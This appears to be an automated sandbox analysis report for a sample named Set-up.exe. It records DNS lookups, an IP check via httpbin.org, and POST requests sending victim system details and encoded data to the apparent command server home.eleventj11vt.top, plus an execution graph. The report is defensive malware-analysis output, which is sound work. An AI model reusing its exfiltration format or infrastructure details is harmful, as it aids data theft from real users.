                                    Dec 31, 2024 16:42:26.181792974 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181818962 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181865931 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181891918 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181917906 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181957006 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.181982994 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.182029963 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.182056904 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.182082891 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.182109118 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:26.182136059 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:29.026868105 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:29.067538023 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:29.079931974 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:29.084935904 CET804973134.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:29.084985971 CET4973180192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:30.283953905 CET4973680192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:30.288872004 CET804973634.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:30.288947105 CET4973680192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:30.289189100 CET4973680192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:30.294027090 CET804973634.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:30.927716970 CET804973634.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:30.929086924 CET4973680192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:30.934351921 CET804973634.147.147.173192.168.2.4
                                    Dec 31, 2024 16:42:30.934403896 CET4973680192.168.2.434.147.147.173
                                    Dec 31, 2024 16:42:31.637461901 CET5467653192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:31.642268896 CET53546761.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:31.642396927 CET5467653192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:31.647200108 CET53546761.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:32.103549004 CET5467653192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:32.108588934 CET53546761.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:32.108624935 CET5467653192.168.2.41.1.1.1
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 16:42:12.322237968 CET5736053192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:12.322319984 CET5736053192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:12.329225063 CET53573601.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:12.329924107 CET53573601.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:24.996184111 CET5736353192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:24.996263027 CET5736353192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:25.661195993 CET53573631.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:25.674082041 CET53573631.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:29.465282917 CET5264353192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:29.465341091 CET5264353192.168.2.41.1.1.1
                                    Dec 31, 2024 16:42:30.283088923 CET53526431.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:30.283118963 CET53526431.1.1.1192.168.2.4
                                    Dec 31, 2024 16:42:31.636917114 CET53547881.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 31, 2024 16:42:12.322237968 CET192.168.2.41.1.1.10xf695Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:12.322319984 CET192.168.2.41.1.1.10xfb8bStandard query (0)httpbin.org28IN (0x0001)false
                                    Dec 31, 2024 16:42:24.996184111 CET192.168.2.41.1.1.10x20b6Standard query (0)home.eleventj11vt.topA (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:24.996263027 CET192.168.2.41.1.1.10x3ef2Standard query (0)home.eleventj11vt.top28IN (0x0001)false
                                    Dec 31, 2024 16:42:29.465282917 CET192.168.2.41.1.1.10xed6cStandard query (0)home.eleventj11vt.topA (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:29.465341091 CET192.168.2.41.1.1.10xcb22Standard query (0)home.eleventj11vt.top28IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 31, 2024 16:42:12.329924107 CET1.1.1.1192.168.2.40xf695No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:12.329924107 CET1.1.1.1192.168.2.40xf695No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:25.661195993 CET1.1.1.1192.168.2.40x20b6No error (0)home.eleventj11vt.top34.147.147.173A (IP address)IN (0x0001)false
                                    Dec 31, 2024 16:42:30.283088923 CET1.1.1.1192.168.2.40xed6cNo error (0)home.eleventj11vt.top34.147.147.173A (IP address)IN (0x0001)false
                                    • httpbin.org
                                    • home.eleventj11vt.top
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44973134.147.147.173805324C:\Users\user\Desktop\Set-up.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 31, 2024 16:42:25.682598114 CET12360OUTPOST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1
                                    Host: home.eleventj11vt.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 560661
                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317488340", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                    Dec 31, 2024 16:42:25.687525988 CET2472OUTData Raw: 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 67 76 45 6e 5c 2f 42 4a 33 56 66 44 46 34 49 4c 37 34 30 2b 5a 5a 7a 4f 56 73 39 53 68 2b
                                    Data Ascii: \/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9gvEn\/BJ3VfDF4IL740+ZZzOVs9Sh+Gpa1uRyQjZ8ffuLoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/
                                    Dec 31, 2024 16:42:25.687560081 CET4944OUTData Raw: 6a 74 6f 50 71 62 5c 2f 68 7a 46 5c 2f 77 54 57 5c 2f 36 4e 75 5c 2f 38 41 4d 77 5c 2f 48 76 5c 2f 35 36 56 66 35 6b 34 62 39 6f 6c 78 6e 6a 38 50 52 78 32 41 38 41 65 48 56 67 63 5a 53 68 69 73 45 73 79 38 61 73 77 77 6d 59 66 56 4b 38 56 56 77
                                    Data Ascii: jtoPqb\/hzF\/wTW\/6Nu\/8AMw\/Hv\/56Vf5k4b9olxnj8PRx2A8AeHVgcZShisEsy8aswwmYfVK8VVwzxuFwfg3mmEw2LlRlCVfD4bMsfRo1XKnTxmIjFVZf7ZZ7+yf+jvwtnWa8NZ39MvxbxWdcP5jjMlzjEcM\/Q94TzPh2pmuWV54PMXkWZZ59MHhbOMxylYyjWjgMdmfDeQ43F4VUsRiMoy+pUlhaf8kNFf1vf8OYv+C
                                    Dec 31, 2024 16:42:25.687575102 CET4944OUTData Raw: 74 49 79 64 67 35 56 39 4b 38 4a 61 51 41 33 69 48 78 68 42 63 33 41 43 46 74 49 38 47 32 5a 38 52 58 63 55 6d 64 7a 51 58 6d 73 58 4d 2b 6b 2b 47 59 6f 32 54 43 72 65 36 4c 71 33 69 58 79 70 48 2b 61 7a 66 59 79 6e 75 66 68 70 38 54 4e 50 2b 4c
                                    Data Ascii: tIydg5V9K8JaQA3iHxhBc3ACFtI8G2Z8RXcUmdzQXmsXM+k+GYo2TCre6Lq3iXypH+azfYynufhp8TNP+L3wU0\/x9ptvPaR61oVyLy2mgnhS21eyjay1q0tJJ1U3lnZatBeWcF7HujuBblgQwdV+ca\/IsxzniTKqlbKcVVWGxmCrVsLiXPDUfrdHEYao6NWlJ8rw1ozjJaYbn5k2qjVkftGWcN8I5zTw+d4OjPFYHH4fD4zBx
                                    Dec 31, 2024 16:42:25.687707901 CET4944OUTData Raw: 66 44 5c 2f 41 4d 4d 52 58 63 7a 33 45 38 48 68 5c 2f 77 41 4a 65 4d 4c 5c 2f 41 45 62 53 6f 5a 5a 6e 4a 61 53 51 57 31 71 6a 7a 4f 78 4a 6b 6d 65 53 52 69 57 63 6b 34 74 65 6c 66 48 37 5c 2f 6b 36 7a 39 73 76 5c 2f 41 4c 4f 2b 5c 2f 61 49 5c 2f
                                    Data Ascii: fD\/AMMRXcz3E8Hh\/wAJeML\/AEbSoZZnJaSQW1qjzOxJkmeSRiWck4telfH7\/k6z9sv\/ALO+\/aI\/9WPrNea1\/ut9DltfRj8HKd5OFDhRYWjGUpSVLDYTMswwuFw8OZtxo4bDUaWHoU17lKjTp0oKMIRS\/wCcP9p5UlX+nr9JXGVeWWJzLjfBZtj6yhCE8Xmeb8K8P5nmmYYjkjFVMZmOY4vFY7G4iSdTE4vEV8RWlOr
                                    Dec 31, 2024 16:42:25.687854052 CET2472OUTData Raw: 6e 6d 4e 7a 53 6a 6c 43 34 58 6f 59 71 64 50 32 65 58 30 6e 39 5a 77 31 4a 77 6f 55 61 55 70 75 76 53 68 54 6c 4f 76 69 4a 30 35 59 6e 46 56 5a 59 61 6a 47 65 49 72 56 4b 6a 31 6c 4a 6e 39 76 35 48 34 53 63 55 63 49 35 42 67 4d 72 72 35 78 54 34
                                    Data Ascii: nmNzSjlC4XoYqdP2eX0n9Zw1JwoUaUpuvShTlOviJ05YnFVZYajGeIrVKj1lJn9v5H4ScUcI5BgMrr5xT4sxOEpTjVzHk+o4ivetVqxjHCVqlSFKjh4VI4fDUYYus4UKNOEbJRivlX9orUPJ8L6Npykhr\/WhOw4+aGxs7gOpzzjzru3fgZyg5AyD8dbdvGMd\/Wvov9ozVrO58Q6Do1tf2V4+madd3M4s7qK6WGXULpITHI0LO
                                    Dec 31, 2024 16:42:25.687869072 CET2472OUTData Raw: 62 31 33 55 70 41 49 39 48 74 64 53 30 47 7a 69 4d 64 7a 63 4e 46 5a 7a 58 76 69 54 54 70 33 6e 57 30 30 76 57 72 6a 54 76 77 63 5c 2f 59 6a 62 62 2b 31 39 2b 7a 57 66 2b 71 7a 2b 41 42 2b 66 69 47 79 48 39 61 5c 2f 73 50 38 41 6a 56 38 46 50 68
                                    Data Ascii: b13UpAI9HtdS0GziMdzcNFZzXviTTp3nW00vWrjTvwc\/Yjbb+19+zWf+qz+AB+fiGyH9a\/sP8AjV8FPhf+0L8PdZ+F3xf8K2PjHwZrfkyXGnXbz29zZ31qxey1fR9TspbfUtH1ixdmNrqWm3NvdJHJPbO72lzcwTf5v\/Ss4hy7IfGnA4fPMNicXw7xN4QYPhriCngfZLMqOX4ni\/iDMKGPy327jh547Ks2yzLM1w+HxEqdD
                                    Dec 31, 2024 16:42:25.692133904 CET2472OUTData Raw: 2f 36 39 52 31 59 70 72 5c 2f 64 50 34 66 7a 46 42 30 55 36 6d 2b 6e 39 64 31 5c 2f 58 62 55 68 71 48 42 5c 2f 75 5c 2f 77 44 6f 58 2b 4e 54 55 56 48 49 76 50 38 41 72 35 48 51 56 36 5a 33 54 36 48 2b 56 50 6f 70 65 7a 38 5c 2f 77 5c 2f 34 49 45
                                    Data Ascii: /69R1Ypr\/dP4fzFB0U6m+n9d1\/XbUhqHB\/u\/wDoX+NTUVHIvP8Ar5HQV6Z3T6H+VPopez8\/w\/4IET9fw\/qaZUknb8ajrQ29r5y\/r5lWXv8A73+NN8v5n69fw\/yP84q5Veg6iJ02\/wAuaZViq9AUvs\/P9SPy\/f8AT\/69R1YqOTt+NB0FVo\/xH5U2rFMfp+P9DQaU+vy\/UreX7\/p\/9eo6sUUGhSkX+P0\/w7
                                    Dec 31, 2024 16:42:25.692379951 CET4944OUTData Raw: 50 58 72 33 71 74 39 33 37 6a 5c 2f 50 5c 2f 77 41 39 50 2b 65 50 5c 2f 77 42 66 5c 2f 50 50 65 7a 39 32 50 35 45 78 78 6a 39 5c 2f 7a 5c 2f 6f 5c 2f 2b 65 33 58 38 61 61 56 4b 71 37 2b 54 30 6a 5c 2f 6d 61 30 39 70 35 66 6a 5c 2f 41 4d 41 30 44
                                    Data Ascii: PXr3qt937j\/P\/wA9P+eP\/wBf\/PPez92P5Exxj9\/z\/o\/+e3X8aaVKq7+T0j\/ma09p5fj\/AMA0D\/bb5\/M\/dfu\/+Wvp\/jUEf\/TT\/ln9n\/dxg9P+fof5561NJHuVH3yfXzBxz9k9vsX4jpUMa+X8iJ5P7248qP8A1\/8Ay6\/rz04rMA\/v\/wDXLzcyfl7\/ANfX1pn\/AAONP+Wv2j17+3p\/nPL49nmZ37I
                                    Dec 31, 2024 16:42:25.692472935 CET4944OUTData Raw: 50 57 39 62 30 44 34 68 5c 2f 42 72 34 68 5c 2f 45 36 7a 2b 44 64 6c 34 35 38 47 74 64 65 45 64 4a 31 61 79 68 38 4e 66 45 6d 38 48 68 48 78 76 34 62 2b 49 75 6b 5c 2f 44 5c 2f 41 4d 61 65 46 4e 61 74 72 33 54 39 56 38 4e 51 33 64 72 4c 43 4d 4c
                                    Data Ascii: PW9b0D4h\/Br4h\/E6z+Ddl458GtdeEdJ1ayh8NfEm8HhHxv4b+Iuk\/D\/AMaeFNatr3T9V8NQ3drLCMLxhqUPgzwrofiq71Xwtqo1u\/8Ag9pT+FtD1fV7vxroOo\/tAeGfFHjb4M2fiDSLjw1Z6bDP8Q\/BnhS78UaBFpGua1M2l6jopvYrK61GK2H5fxbxJ4H+I\/D8Mk4qz7Js3yPGZ5gMAsHLM80yyp\/b0alsHg60sBW
                                    Dec 31, 2024 16:42:25.692514896 CET4944OUTData Raw: 2b 49 62 4f 36 30 62 51 50 42 58 67 44 77 6c 34 78 38 61 36 31 4c 5a 61 74 71 47 6e 65 48 62 6a 51 5c 2f 44 5c 2f 69 4c 56 64 4a 6f 58 2b 74 61 4a 42 70 50 78 4c 38 55 61 46 34 36 2b 47 58 6a 7a 77 56 38 4d 66 45 6e 77 5a 38 4c 61 68 34 72 38 46
                                    Data Ascii: +IbO60bQPBXgDwl4x8a61LZatqGneHbjQ\/D\/iLVdJoX+taJBpPxL8UaF46+GXjzwV8MfEnwZ8Lah4r8F6\/4yNv4g1L442nxEufCw0LQvGnw68E+KtOOlSfC7xXaeI7HxzoXgzWbd00vUNG0vXND1az1Z\/RxH0WPon0a1HDVPETj+UsT\/ZEKdXD8fY\/EYVz4gq4ahklGWYYXK6mEo4nNZ4vDSwFCpiaeIxFGr9ZpU3QjOr
                                    Dec 31, 2024 16:42:29.026868105 CET290INHTTP/1.1 502 Bad Gateway
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 15:42:28 GMT
                                    content-type: text/html
                                    content-length: 157
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.44973634.147.147.173805324C:\Users\user\Desktop\Set-up.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 31, 2024 16:42:30.289189100 CET353OUTPOST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1
                                    Host: home.eleventj11vt.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 209
                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                    Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                    Dec 31, 2024 16:42:30.927716970 CET290INHTTP/1.1 502 Bad Gateway
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 15:42:30 GMT
                                    content-type: text/html
                                    content-length: 157
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44973034.200.57.1144435324C:\Users\user\Desktop\Set-up.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-31 15:42:13 UTC52OUTGET /ip HTTP/1.1
                                    Host: httpbin.org
                                    Accept: */*
                                    2024-12-31 15:42:13 UTC224INHTTP/1.1 200 OK
                                    Date: Tue, 31 Dec 2024 15:42:13 GMT
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Connection: close
                                    Server: gunicorn/19.9.0
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
                                    2024-12-31 15:42:13 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                    Data Ascii: { "origin": "8.46.123.189"}


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Target ID:0
                                    Start time:10:42:11
                                    Start date:31/12/2024
                                    Path:C:\Users\user\Desktop\Set-up.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                    Imagebase:0x510000
                                    File size:7'793'288 bytes
                                    MD5 hash:3D060EC62AD0864CFD0D40F46A4F07A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:1.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:37.6%
                                      Total number of Nodes:1072
                                      Total number of Limit Nodes:52
                                      execution_graph 84893 517310 84894 517320 84893->84894 84896 517332 84893->84896 84895 517390 84894->84895 84894->84896 84906 5172a0 47 API calls 84895->84906 84898 517383 84896->84898 84899 517366 84896->84899 84905 5172a0 47 API calls 84899->84905 84900 5173a1 __acrt_iob_func 84907 51cb20 75 API calls 84900->84907 84903 517380 84903->84898 84904 5173c1 fflush _errno 84904->84898 84905->84903 84906->84900 84907->84904 84908 548b50 84909 548b6b 84908->84909 84946 548be6 84908->84946 84910 548bf3 84909->84910 84911 548b8f 84909->84911 84909->84946 84947 54a550 84910->84947 85061 526e40 11 API calls 84911->85061 84914 548ba1 84916 548cd9 SleepEx getsockopt 84914->84916 84918 548c99 84914->84918 84935 548bb5 84914->84935 84919 548d22 84916->84919 84920 548d18 WSAGetLastError 84916->84920 84917 548ccf 84921 548e85 84917->84921 84924 54a150 72 API calls 84917->84924 84917->84946 84918->84916 84925 548cb2 84918->84925 84919->84917 84927 548d43 84919->84927 84920->84919 84928 548eae 84921->84928 84921->84946 85068 522a00 47 API calls 84921->85068 84922 548c35 WSAGetLastError 85048 54a150 84922->85048 84923 548c1f connect 84923->84922 84929 548dff WSASetLastError 84924->84929 84925->84917 85063 54b180 SleepEx getsockopt WSAGetLastError 84925->85063 84937 54a150 72 API calls 84927->84937 84928->84946 85069 5178b0 closesocket 84928->85069 84929->84921 84933 548e1b 84929->84933 84933->84921 85066 52d090 63 API calls 84933->85066 84934 548c8b 84934->84918 84938 548dc8 84934->84938 84942 548d66 84935->84942 84935->84946 84937->84942 85065 54b100 65 API calls 84938->85065 84939 548e67 85067 554fd0 48 API calls 84939->85067 84942->84946 85064 5550a0 48 API calls 84942->85064 84948 54a575 84947->84948 84950 54a597 84948->84950 85074 5175e0 84948->85074 84952 54a6d9 84950->84952 85087 54ef30 84950->85087 84951 54a709 84957 5178b0 48 API calls 84951->84957 84971 54a713 84951->84971 84952->84951 84952->84971 85097 522a00 47 API calls 84952->85097 84954 548bfc 84954->84917 84954->84922 84954->84923 84954->84946 84956 54a63a 84958 54a641 84956->84958 84959 54a69b _errno _errno _errno 84956->84959 84957->84971 84960 54a650 setsockopt 84958->84960 84962 54a683 84958->84962 85095 52d090 63 API calls 84959->85095 84960->84962 84963 54a7e5 84960->84963 84962->84963 85099 554fd0 48 API calls 84962->85099 84967 54a8ee 84963->84967 84968 54a802 84963->84968 84964 54a6c9 85096 554f40 49 API calls 84964->85096 84972 54a962 getsockopt 84967->84972 84973 54a92a 84967->84973 84985 54a9ac 84967->84985 84970 54a811 setsockopt 84968->84970 84999 54a87c 84968->84999 84974 54a83b 84970->84974 84970->84999 84971->84954 85098 5550a0 48 API calls 84971->85098 84979 54a984 84972->84979 84980 54a991 setsockopt 84972->84980 85103 537620 11 API calls 84973->85103 84984 54a854 WSAGetLastError 84974->84984 84974->84999 84975 54ac6a 84975->84985 85104 54b1e0 55 API calls 84975->85104 84976 54ac20 getsockopt 84986 54ac42 84976->84986 84987 54ac4f setsockopt 84976->84987 84977 54a8b9 85102 537620 11 API calls 84977->85102 84979->84980 84979->84985 84980->84985 84983 54a945 84983->84972 84989 54a94c 84983->84989 85100 52d090 63 API calls 84984->85100 84985->84952 84996 54af41 84985->84996 85000 54abe1 84985->85000 85001 54ab0a strlen 84985->85001 84986->84975 84986->84987 84987->84975 84988 54a8d4 84988->84976 84992 54a8df 84988->84992 84989->84985 84992->84975 84993 54a86d 85101 554fd0 48 API calls 84993->85101 84994 54af56 84997 54af5d 84994->84997 84998 54afb9 WSAGetLastError 84994->84998 85094 5767e0 ioctlsocket 84996->85094 84997->84971 85002 54a150 72 API calls 84997->85002 84998->84952 84999->84975 84999->84976 84999->84977 85003 54aed3 htons 85000->85003 85004 54abee 85000->85004 85001->85000 85008 54ab22 85001->85008 85002->84971 85005 54aeeb bind 85003->85005 85004->85005 85006 54abf9 htons 85004->85006 85014 54afcf 85005->85014 85016 54af03 85005->85016 85007 54ac0c 85006->85007 85007->85005 85010 54ae32 85008->85010 85011 54acb8 85008->85011 85013 54abb9 85008->85013 85009 54b056 WSAGetLastError 85115 52d090 63 API calls 85009->85115 85010->85013 85111 554fd0 48 API calls 85010->85111 85011->84952 85011->85013 85027 54acdc WSAGetLastError 85011->85027 85012 54af33 85012->84996 85017 54ad45 85013->85017 85021 54adc5 85013->85021 85029 54adea WSAGetLastError 85013->85029 85106 546be0 109 API calls 85013->85106 85014->85009 85018 54aff8 htons bind 85014->85018 85114 554fd0 48 API calls 85014->85114 85016->85012 85113 554fd0 48 API calls 85016->85113 85025 54ade6 85017->85025 85040 54ad5f 85017->85040 85018->85014 85018->85016 85019 54b07b 85116 554f40 49 API calls 85019->85116 85021->84952 85022 54ae8e 85021->85022 85023 54aeb8 85021->85023 85022->85005 85033 54ae93 strchr 85022->85033 85112 5745c0 12 API calls 85023->85112 85025->85029 85105 52d090 63 API calls 85027->85105 85109 52d090 63 API calls 85029->85109 85036 54aead 85033->85036 85035 54b08b 85035->84952 85117 5745c0 12 API calls 85036->85117 85037 54ad01 85110 554f40 49 API calls 85037->85110 85038 54aecc 85038->85003 85038->85005 85039 54adb7 85108 563030 47 API calls 85039->85108 85040->85039 85107 554fd0 48 API calls 85040->85107 85044 54b0bf 85044->85007 85046 54b0ca htons 85044->85046 85046->85007 85047 54b0e5 strtoul 85046->85047 85047->85007 85049 54a15f 85048->85049 85060 548c4d 85048->85060 85050 54a181 getsockname 85049->85050 85049->85060 85051 54a1f7 85050->85051 85052 54a1d0 WSAGetLastError 85050->85052 85054 54ef30 48 API calls 85051->85054 85122 52d090 63 API calls 85052->85122 85055 54a20f 85054->85055 85057 54a216 _errno _errno 85055->85057 85055->85060 85056 54a1eb 85124 554f40 49 API calls 85056->85124 85123 52d090 63 API calls 85057->85123 85060->84934 85062 5550a0 48 API calls 85060->85062 85061->84914 85062->84934 85063->84917 85064->84946 85065->84917 85066->84939 85067->84921 85068->84928 85070 5178c5 85069->85070 85071 5178dc 85069->85071 85125 5172a0 47 API calls 85070->85125 85071->84946 85073 